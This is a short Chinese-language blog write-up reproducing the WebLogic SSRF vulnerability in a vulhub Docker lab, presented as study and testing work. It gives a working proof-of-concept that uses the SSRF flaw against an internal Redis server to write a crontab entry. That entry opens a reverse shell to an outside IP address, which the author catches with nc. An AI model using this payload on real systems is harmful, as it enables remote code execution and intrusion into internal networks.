Weblogic-SSRF 漏洞复现

2022-09-22 19:02:42 浏览数 (1)

0x01 环境搭建

我这里使用的是vulhub,它几乎包含了所有的漏洞环境。(建议安装在ubuntu上)

有需要的小伙伴来企鹅群自取。

安装好vulhub之后需要cd 到weblogic ssrf 目录下

然后启动测试环境

docker-compose build

docker-compose up -d

此次环境搭建在Ubuntu上

0x02 漏洞简介

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

0x03 影响版本

weblogic版本10.0.2

weblogic 版本10.3.6

0x04 漏洞复现

访问http://虚拟机-ip:7001/uddiexplorer/

抓包,发送到重放

查看Ubuntu -redis 的ip

然后改包

Poc:

http://172.18.0.2:6379/test set 1 "nnnn* * * * * root bash -i >& /dev/tcp/192.168.15.131/1236 0>&1nnnn" config set dir /etc/ config set dbfilename crontab save aaa

然后发包,

此时继续打开Ubuntu 使用nc反弹shell

也可以使用其他虚拟机来弹shell,具体姿势还没研究,

研究过的小伙伴可以告告我呦

0 人点赞